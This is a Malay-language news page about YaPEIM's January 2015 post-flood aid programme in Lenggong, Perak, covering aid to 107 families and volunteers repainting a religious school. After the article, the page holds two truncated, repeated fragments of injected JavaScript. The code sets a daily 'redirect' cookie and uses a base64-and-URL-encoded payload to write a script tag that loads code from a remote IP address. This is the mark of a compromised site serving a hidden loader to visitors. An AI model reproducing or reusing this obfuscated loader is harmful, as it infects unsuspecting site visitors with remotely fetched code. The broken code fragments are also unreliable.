YaPEIM » Perkasa Komuniti Pasca Banjir di Lenggong, Perak

Terkini

Perkasa Komuniti Pasca Banjir di Lenggong, Perak

YaPEIM turut mengadakan aktiviti gotong royong pembersihan dan mengecat semula Sekolah Agama Rakyat Madrasah Hidayatul Quran

PADA 30 Januari 2015, Yayasan Pembangunan Ekonomi Islam Malaysia (YaPEIM) telah mengadakan Program Perkasa Komuniti Pasca Banjir bertempat di Kampung Beng, Lenggong, Perak Darul Ridzuan.

Tujuan program ini diadakan adalah untuk memberi sumbangan kepada 107 keluarga mangsa-mangsa banjir khususnya di Kg. Beng, Kg. Labit dan Kg. Tampan Air serta Pelancaran Program Perkasa Komuniti Pasca Banjir anjuran YaPEIM. Pihak YaPEIM juga turut mengadakan aktiviti gotong royong pembersihan dan mengecat semula Sekolah Agama Rakyat Madrasah Hidayatul Quran di Kg. Kota Tampan Air yang turut terjejas akibat banjir.

Yang Berbahagia Dato’ Haji Abd Malek Awang Kechil, Presiden dan Pengerusi Lembaga Pemegang Amanah YaPEIM, diiringi Yang Berbahagia Dato’ Abibullah Hj Samsudin Ketua Pengarah YaPEIM, Pengurusan Utama YaPEIM dan Koperasi YaPEIM Berhad turut meluangkan masa untuk menjayakan program di Kg. Beng ini.

Program ini juga turut dimeriahkan dengan kehadiran YB Dato’ Shamsul Anuar Hj Nasarah, Ahli Parlimen Lenggong, En Fahmi Bin Othman, pegawai Khas YB Dato’ Saarani Mohamad, Pengerusi Jawatankuasa Pembangunan Luar Bandar, perladangan, Pertanian, perumahan dan Kerajaan Tempatan erangkap ADUN Kota Tampan, Penghulu Mukim Durian Pipit En Mohd Rizal Nordin, Ketua Kg. Beng En Mohd Alias Mat Arshad, serta penduduk Kg. Beng, lenggong, perak.

Secara keseluhurannya, selain menyediakan jamuan berbentuk kenduri rakyat secara gotong royong di Kg. Beng, pengisian program yang berbentuk program kemasyarakatan iaitu aktiviti pembersihan dan mengecat Sekolah Agama Rakyat Madrasah Hidayatul Quran turut dijalankan oleh sukarelawan dari YaPEIM. Pihak YaPEIM turut menyumbangkan 40 naskah Al Quran dan Surah Yassin serta cat untuk aktiviti mengecat semula Sekolah Agama Rakyat Madrasah Hidayatul Quran yang terjejas akibat bencana banjir.

Pihak YaPEIM juga menyumbangkan sumbangan bantuan kepada 107 keluarga yang terjejas akibat banjir di sekitar Kg. Beng, Kg. Labit dan Kg. Tampan Air, lenggong, Perak.

Kesimpulannya, Program seperti ini lebih mengeratkan lagi hubungan YaPEIM dengan masyarakat setempat seterusnya memberi kefahaman yang lebih terperinci berkenaan program-program YaPEIM. Program seperti ini juga menunjukan YaPEIM serius dalam membantu meringankan beban keluarga yang terjejas akibat bencana banjir yang melanda.

([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

Top

Comments are closed.

Top